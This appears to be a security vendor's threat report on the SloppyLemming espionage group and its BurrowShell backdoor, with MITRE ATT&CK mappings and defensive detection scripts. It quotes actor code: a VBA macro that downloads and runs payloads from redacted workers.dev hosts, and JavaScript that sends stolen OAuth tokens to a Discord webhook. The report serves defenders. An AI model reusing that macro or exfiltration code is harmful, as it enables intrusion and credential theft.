SloppyLemming Attack Techniques & BurrowShell Backdoor Explained

Overview

SloppyLemming is a cyber-espionage group active since 2021. It targets government, energy, telecom, and technology sectors in Pakistan, Bangladesh, and Sri Lanka. The group uses custom malware, abuses Cloudflare Workers for C2, and gains access through spearphishing.

Known Aliases

  • Outrider Tiger
  • Fishing Elephant

Associated Malware or Tools

  • BurrowShell (shellcode backdoor)
  • Rust-based keylogger
  • CloudPhish (Credential theft utility for Cloudflare Workers)
  • Python-based web drivers

Techniques and TTPs (MITRE ATT&CK Mapping)

  • T1583.001 Acquire Infrastructure: Domains
  • T1587.001 Develop Capabilities: Malware
  • T1566.001 Phishing: Spearphishing Attachment
  • T1566.002 Phishing: Spearphishing Link
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1027.007 Obfuscated Files or Information: Dynamic API Resolution
  • T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
  • T1036.005 Masquerading: Match Legitimate Name or Location
  • T1574.001 Hijack Execution Flow: DLL Search Order Hijacking
  • T1056 Input Capture
  • T1082 System Information Discovery
  • T1560 Archive Collected Data
  • T1071.001 Application Layer Protocol: Web Protocols
  • T1041 Exfiltration Over C2 Channel

Detection and Prevention

SloppyLemming is a cyber-espionage group active since at least 2021. It targets telecommunications, energy, defense, and government sectors across South and East Asia, with a concentrated focus on Pakistan, Bangladesh, and Sri Lanka.

The group runs persistent, multi-stage attack campaigns. It builds its own malware, including the BurrowShell backdoor and a Rust-based keylogger. It abuses cloud platforms like Cloudflare Workers to host payloads, steal credentials, and manage command-and-control communications. It registers domains that mimic legitimate government agencies to deceive targets.

SloppyLemming gains initial access through spearphishing. It sends malicious Excel files with VBA macros, fake authentication portals, and blurred PDF lures. Once inside a network, it captures keystrokes, harvests credentials, collects email inbox data, and exfiltrates files back to its C2 servers.

This blog covers the group's major activities, the MITRE ATT&CK techniques it uses, and how you can simulate its attacks to validate your defenses.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the SloppyLemming Group?

2021 (at least) – The group initiated its cyber-espionage operations across South and East Asia, with a primary focus on the telecommunications, energy, defense, and government sectors in Pakistan, Bangladesh, and Sri Lanka [1].

Late 2022 – SloppyLemming began heavily abusing Cloudflare Workers, a serverless computing platform, to orchestrate malware delivery, command-and-control (C2) communications, and credential theft [2].

September 2024 – A large-scale credential harvesting operation was observed, wherein a custom-developed utility dubbed "CloudPhish" was utilized to fabricate deceptive webmail login portals designed to compromise defense and government personnel [2].

January 2025 – January 2026 – An extended cyber-espionage campaign was executed against critical infrastructure and government targets in Bangladesh and Pakistan, utilizing malicious documents to deploy the BurrowShell backdoor and a custom keylogger [1].

Which MITRE ATT&CK Techniques Are Used by SloppyLemming?

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

SloppyLemming registered and utilized over 112 Cloudflare Workers subdomains over an extended period. These domains were structurally designed to mimic authentic government agencies and organizations located within Pakistan and Bangladesh.

T1587.001 Develop Capabilities: Malware

SloppyLemming crafted specialized malware to facilitate its operations, which notably included an x64 in-memory shellcode implant called "BurrowShell" and a fully-featured Rust-based keylogger [1].

Additionally, operators employed a customized utility known as "CloudPhish," engineered specifically to dynamically assemble deceptive Cloudflare Worker scripts designed for credential theft [2].

Tactic: Initial Access

T1566.001 Phishing: Spearphishing Attachment

Operators initiated intrusions by dispatching spearphishing emails carrying Microsoft Excel spreadsheets with malicious macros to download malware.

T1566.002 Phishing: Spearphishing Link

Targets received emails with links pointing to fake authentication portals or blurred PDF lures.

The PDF lures displayed a "PDF reader is disabled" message with a "Download file" button. Clicking it triggered a ClickOnce application manifest download.

The actor also used a draft phishing template impersonating police IT departments, demanding users update their access credentials within 24 hours or face account suspension.

Tactic: Execution

T1059.005 Command and Scripting Interpreter: Visual Basic

Malicious Excel files contained VBA macros that downloaded two files: sppc.dll and audiodg.exe. After downloading, the macro ran audiodg.exe to begin the next stage [1].

Sub Main()

   ' Download sppc.dll
   payloadURL = "https://<redacted>.workers.dev/favicon.ico"
   savePath = Environ("ProgramData") & "\sppc.dll"
   Download payloadURL, savePath, userAgent

   ' Download audiodg.exe
   payloadURL = "https://<redacted>.workers.dev/audiodg.pdf"
   savePath = Environ("ProgramData") & "\audiodg.exe"
   Download payloadURL, savePath, userAgent

   ' Execute audiodg.exe
   strCmd = Environ("ProgramData") & "\audiodg.exe"
   ExecuteCmdAsync strCmd

End Sub

Tactic: Persistence

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The malicious loader used by SloppyLemming wrote a registry entry under Software\Microsoft\Windows\CurrentVersion\Run, using the key name "OneDrive" to disguise the entry. This caused OneDrive.exe to launch automatically on every system reboot.

Tactic: Defense Evasion

T1027.007 Obfuscated Files or Information: Dynamic API Resolution

The BurrowShell backdoor resolves Windows API functions at runtime by hashing function names and comparing the hashes against pre-stored values [1]. Because the imported API names never appear in the binary, this hinders static analysis and signature-based detection.

api_table[8] = ResolveByHash(a1, a2, 0xBDC96028, *api_table, v4, v5);
api_table[31] = ResolveByHash(a1, a2, 0x83E94598, *api_table, v6, v7);
api_table[32] = ResolveByHash(a1, a2, 0x830E924, *api_table, v8, v9);

T1027.013 Obfuscated Files or Information: Encrypted/Encoded File

The shellcode payload shipped as an RC4-encrypted blob named system32.dll. The loader decrypted it at runtime using the hardcoded 32-character key "boikztaigkuneapfvpesuabfmpxgwnad" before transferring execution [1].
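An analyst unpacking a captured system32.dll blob needs the RC4 step described above. The helper below is an added example, not code from the report or from the actor; it implements textbook RC4 and the only value it takes from the report is the 32-character key. The self-check uses the standard RC4 test vector (key "Key", plaintext "Plaintext").

```python
# Added analyst helper: RC4 as used by the BurrowShell loader.
# The only report-derived value is the hardcoded 32-character key.
RC4_KEY = b"boikztaigkuneapfvpesuabfmpxgwnad"


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be between 1 and 256 bytes")
    # Key-scheduling algorithm (KSA): permute the 256-byte state with the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA): XOR each byte with keystream.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def known_answer_ok() -> bool:
    """Standard RC4 test vector: key 'Key', plaintext 'Plaintext'."""
    return rc4_crypt(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


def decrypt_blob(blob: bytes, key: bytes = RC4_KEY) -> bytes:
    """Recover the plaintext from an RC4-encrypted system32.dll blob."""
    return rc4_crypt(key, blob)


if __name__ == "__main__":
    import sys
    assert known_answer_ok(), "RC4 implementation failed its test vector"
    # Usage: python rc4_unpack.py system32.dll > decrypted.bin
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as f:
            sys.stdout.buffer.write(decrypt_blob(f.read()))
    else:
        # Constructed sample: encrypt placeholder bytes, then decrypt them again.
        sample = rc4_crypt(RC4_KEY, b"constructed placeholder, not real payload")
        print(decrypt_blob(sample))
```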

T1036.005 Masquerading: Match Legitimate Name or Location

The actor renamed files to blend with Windows components. Malicious DLLs used names like mscorsvc.dll, sppc.dll, and system32.dll. One DLL was named Outlook.eml to disguise it as an email file.

C2 traffic also used a Windows Update User-Agent string to appear as routine system traffic.

T1574.001 Hijack Execution Flow: DLL Search Order Hijacking

The actor used legitimate, digitally signed Microsoft binaries to load its malicious libraries.

For example, NGenTask.exe loaded mscorsvc.dll, a malicious DLL loader that decrypts and executes the BurrowShell shellcode. phoneactivate.exe loaded sppc.dll, a Rust-based keylogger with remote access capabilities.

In earlier campaigns, CamScanner 06-12-2024 15.29.pdf.exe loaded CRYPTSP.dll from a WinRAR archive exploiting CVE-2023-38831 [2].
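A defender can turn the masquerading names and the signed-host/DLL pairs above into an image-load check. The script below is an added example, not code from the report; the DLL names and host binaries come from the report, while the event format, the sample paths and the trusted-directory rule are assumptions.

```python
import re
from pathlib import PureWindowsPath

# DLL names the actor used for masquerading and side-loading (from the report).
SUSPECT_DLLS = {"mscorsvc.dll", "sppc.dll", "cryptsp.dll", "system32.dll"}
# Signed Microsoft binaries abused as loaders (from the report).
ABUSED_HOSTS = {"ngentask.exe", "phoneactivate.exe"}
# Where a genuine copy of a Windows DLL is expected to live (assumption).
TRUSTED_DIRS = ("c:\\windows\\",)

# Constructed image-load event format: "Image: <process> ImageLoaded: <dll>".
EVENT_RE = re.compile(r"Image:\s*(?P<image>.+?)\s+ImageLoaded:\s*(?P<loaded>.+?)\s*$")


def parse_event(line):
    m = EVENT_RE.search(line)
    return None if m is None else {"image": m["image"], "loaded": m["loaded"]}


def is_sideload(event):
    host = PureWindowsPath(event["image"]).name.lower()
    dll = PureWindowsPath(event["loaded"]).name.lower()
    if event["loaded"].lower().startswith(TRUSTED_DIRS):
        return False  # loaded from the Windows directory itself
    # Rule 1: a DLL carrying one of the reported names, loaded from anywhere else.
    # Rule 2: an abused signed host loading any DLL from outside Windows.
    return dll in SUSPECT_DLLS or host in ABUSED_HOSTS


def scan(lines):
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev and is_sideload(ev):
            hits.append((PureWindowsPath(ev["image"]).name, ev["loaded"]))
    return hits


# Constructed sample events; paths are illustrative, not taken from the report.
SAMPLE_LOG = [
    r"Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe ImageLoaded: C:\ProgramData\mscorsvc.dll",
    r"Image: C:\Windows\System32\phoneactivate.exe ImageLoaded: C:\ProgramData\sppc.dll",
    r"Image: C:\Windows\System32\phoneactivate.exe ImageLoaded: C:\Windows\System32\sppc.dll",
    r"Image: C:\Program Files\Vendor\app.exe ImageLoaded: C:\Program Files\Vendor\helper.dll",
    r"Image: C:\Users\michael\Downloads\CamScanner 06-12-2024 15.29.pdf.exe ImageLoaded: C:\Users\michael\AppData\Local\Temp\CRYPTSP.dll",
]

if __name__ == "__main__":
    for image, dll in scan(SAMPLE_LOG):
        print(f"possible DLL side-load: {image} loaded {dll}")
```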

Tactic: Credential Access

T1056 Input Capture

SloppyLemming deployed a Rust-based keylogger. The keylogger captured keystrokes including special keys such as [PGUP], [HOME], and [DEL].

The group also established an OAuth interception flow to capture Google tokens and route them to a Discord webhook [2].

async function sendToDiscord(tokenData, userinfo) {
   const data = {
       content: `Captured OAuth Token:\n\`\`\`json\n${JSON.stringify(tokenData, null, 2)}\n\`\`\``
   };
}

// OAuth flow

const tokenData = await tokenResponse.json();
await sendToDiscord(tokenData);

// Redirecting the user to a decoy PDF after capturing the token
const pdfUrl = 'https://<redacted>';
return Response.redirect(pdfUrl, 302);

Tactic: Discovery

T1082 System Information Discovery

BurrowShell collected the computer name, logged-in username, system architecture, and administrator rights status, and derived a unique device ID from this data using a custom formula.

This data is sent as JSON via HTTP POST to the /beta/deviceManagement/managedDevices endpoint of the C2 server to register the device.

Tactic: Collection

T1560 Archive Collected Data

SloppyLemming also deployed Python-based web drivers to automate inbox collection from compromised email accounts.

Here is the Python script used for this purpose [2]:

# Iterate through each email in the inbox
emails = driver.find_elements(By.CSS_SELECTOR, 'div[class="zA zE"]')
for email in emails:
   # Click on the email
   email.click()
   # Search for attachments and click on download links
   attachments = driver.find_elements(By.CSS_SELECTOR,
       'a.AttLink[id^="zv_CLV_main_MSGC"][title="Download"]')
   for attachment in attachments:
       attachment.click()
   # Go back to the Inbox
   driver.execute_script("window.history.go(-1)")

Tactic: Command and Control

T1071.001 Application Layer Protocol: Web Protocols

Both the Rust-based keylogger and BurrowShell communicated over HTTPS.

The BurrowShell device registration payload, sent via HTTP POST to /beta/deviceManagement/managedDevices:

// JSON Registration Payload

{
   "device_id": 256947464,
   "computer_name": "Example Computer",
   "user_name": "michael",
   "process_id": 1234,
   "arch": "x64",
   "os_info": "Windows",
   "is_admin": true
}

A similar logic is used for keylogger’s device registration process.

After the registrations, the malware repeatedly sent POST requests with device_id to fetch the commands to be executed.

{ "tasks": [ { "command": "<COMMAND_TO_BE_EXECUTED>", "args": [] } ] }
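The registration endpoint and the Windows Update User-Agent noted under T1036.005 combine into a proxy-log check. The script below is an added example, not code from the report; the path comes from the report, while the log format, the User-Agent pattern, the Microsoft host suffixes and the sample lines are assumptions. The same path exists on the legitimate Microsoft Graph beta API, which is why the rule keys on the destination host rather than the path alone.

```python
import re
from urllib.parse import urlsplit

# Registration endpoint both implants POST to (from the report). The same path
# exists on the legitimate Microsoft Graph beta API, so the host is what matters.
C2_PATH = "/beta/deviceManagement/managedDevices"
GRAPH_HOSTS = {"graph.microsoft.com"}
# Hosts a genuine Windows Update client talks to (assumed suffix list).
WU_HOST_SUFFIXES = (".windowsupdate.com", ".microsoft.com")
# The report only says "a Windows Update User-Agent"; this pattern is an assumption.
WU_UA_RE = re.compile(r"Windows-Update-Agent", re.I)


def parse_proxy_line(line):
    """Constructed log format: timestamp|method|url|user-agent."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        return None
    ts, method, url, ua = parts
    u = urlsplit(url)
    return {"ts": ts, "method": method.upper(), "host": (u.hostname or "").lower(),
            "path": u.path, "ua": ua}


def classify(req):
    """Return the reasons a request resembles SloppyLemming C2 (empty if none)."""
    reasons = []
    if req["method"] == "POST" and req["path"] == C2_PATH and req["host"] not in GRAPH_HOSTS:
        reasons.append("Graph-style device registration path on a non-Microsoft host")
    if WU_UA_RE.search(req["ua"]) and not req["host"].endswith(WU_HOST_SUFFIXES):
        reasons.append("Windows Update User-Agent sent to a non-Microsoft host")
    return reasons


def scan(lines):
    hits = []
    for line in lines:
        req = parse_proxy_line(line)
        if req is not None and (reasons := classify(req)):
            hits.append((req["host"], req["path"], reasons))
    return hits


WU_UA = "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.0"  # constructed
SAMPLE_LOG = [  # constructed proxy lines; hosts and the /tasks path are illustrative
    f"2026-02-01T10:00:00Z|POST|https://example.workers.dev{C2_PATH}|{WU_UA}",
    f"2026-02-01T10:00:05Z|POST|https://graph.microsoft.com{C2_PATH}|Mozilla/5.0 IntuneConsole",
    f"2026-02-01T10:00:09Z|GET|http://download.windowsupdate.com/c/msdownload/update/x.cab|{WU_UA}",
    f"2026-02-01T10:01:00Z|POST|https://example.workers.dev/tasks|{WU_UA}",
]
```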

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

BurrowShell can capture screens, read files off disk, and run commands. These functions gather the data that is later exfiltrated.

The Rust keylogger can also hook Windows input to capture keystrokes continuously, writing them to a local log.

Both malware families sent the collected data back via HTTP POST to dedicated C2 endpoints.

How Does Picus Simulate SloppyLemming Attacks?

We also strongly suggest simulating SloppyLemming Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for SloppyLemming:

Threat ID | Threat Name                         | Attack Module
71299     | SloppyLemming Threat Group Campaign | Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the SloppyLemming Group?

SloppyLemming is also known as: Outrider Tiger, Fishing Elephant.

Key Takeaways

  • SloppyLemming is a cyber-espionage group active since at least 2021, targeting telecommunications, energy, defense, and government sectors across South and East Asia, with a primary focus on Pakistan, Bangladesh, and Sri Lanka.
  • The group abuses Cloudflare Workers to host payloads, steal credentials, and manage command-and-control (C2) communications, registering over 112 subdomains designed to mimic legitimate government agencies.
  • SloppyLemming builds its own malware, including the BurrowShell backdoor (an x64 in-memory shellcode implant) and a Rust-based keylogger that captures keystrokes and intercepts Google OAuth tokens.
  • Initial access relies on spearphishing: malicious Excel files with VBA macros, fake authentication portals, and blurred PDF lures that trick targets into downloading malicious payloads.
  • The group evades detection through dynamic API resolution, RC4-encrypted payloads, and file masquerading using names like mscorsvc.dll and system32.dll to blend in with legitimate Windows components.
  • To maintain persistence, SloppyLemming writes a registry entry under Software\Microsoft\Windows\CurrentVersion\Run using the key name "OneDrive," causing its loader to launch automatically on every system reboot.
  • Picus Threat Library includes a dedicated threat simulation for SloppyLemming (Threat ID 71299) under the Windows Endpoint attack module, allowing security teams to test their defenses against this group's tactics directly.

References

[1] A. W. Labs, "SloppyLemming Deploys BurrowShell and Rust-Based RAT to Target Pakistan and Bangladesh," Arctic Wolf. Accessed: Mar. 16, 2026. [Online]. Available: https://arcticwolf.com/resources/blog/sloppylemming-deploys-burrowshell-and-rust-based-rat-to-target-pakistan-and-bangladesh/

[2] "Unraveling SloppyLemming's operations across South Asia," Cloudflare. Accessed: Mar. 16, 2026. [Online]. Available: https://www.cloudflare.com/cloudforce-one/research/unraveling-sloppylemmings-operations-across-south-asia/

FAQ

Q: What is SloppyLemming?

A: SloppyLemming is a cyber-espionage group active since at least 2021. It targets telecommunications, energy, defense, and government sectors across South and East Asia, with a primary focus on Pakistan, Bangladesh, and Sri Lanka. The group is also known by the aliases Outrider Tiger and Fishing Elephant.

Q: How does SloppyLemming gain initial access to its targets?

A: SloppyLemming gains initial access through spearphishing. Attackers send malicious Excel files with VBA macros, links to fake authentication portals, and blurred PDF lures that display a "PDF reader is disabled" message. Clicking the download button triggers a ClickOnce application manifest, beginning the infection chain.

Q: What custom malware does SloppyLemming use?

A: SloppyLemming builds its own malware. Its primary tools are the BurrowShell backdoor, an x64 in-memory shellcode implant, and a Rust-based keylogger. The keylogger captures keystrokes and intercepts Google OAuth tokens, routing them to a Discord webhook. A separate utility called CloudPhish generates fake Cloudflare Worker scripts for credential theft.

Q: How does SloppyLemming avoid detection?

A: SloppyLemming uses dynamic API resolution to block static analysis, ships payloads as RC4-encrypted blobs, and renames malicious files to mimic legitimate Windows components like mscorsvc.dll and system32.dll. C2 traffic uses a Windows Update User-Agent string to blend in with routine system activity.

Q: How does SloppyLemming maintain persistence on infected systems?

A: The malicious loader writes a registry entry under Software\Microsoft\Windows\CurrentVersion\Run using the key name "OneDrive." This causes the loader to launch automatically on every system reboot, disguising the persistence mechanism as a legitimate OneDrive process.

Q: What role does Cloudflare Workers play in SloppyLemming's operations?

A: SloppyLemming registered over 112 Cloudflare Workers subdomains, structuring them to mimic legitimate government agencies in Pakistan and Bangladesh. The group uses these subdomains to host payloads, manage command-and-control communications, and run credential harvesting portals targeting defense and government personnel.

Q: How does Picus Security address the SloppyLemming threat?

A: Picus Threat Library includes a dedicated simulation for SloppyLemming under Threat ID 71299, available in the Windows Endpoint attack module. Security teams use this simulation to test their controls directly against SloppyLemming's tactics, techniques, and procedures, and receive actionable mitigation insights based on the results.

Author: Picus Labs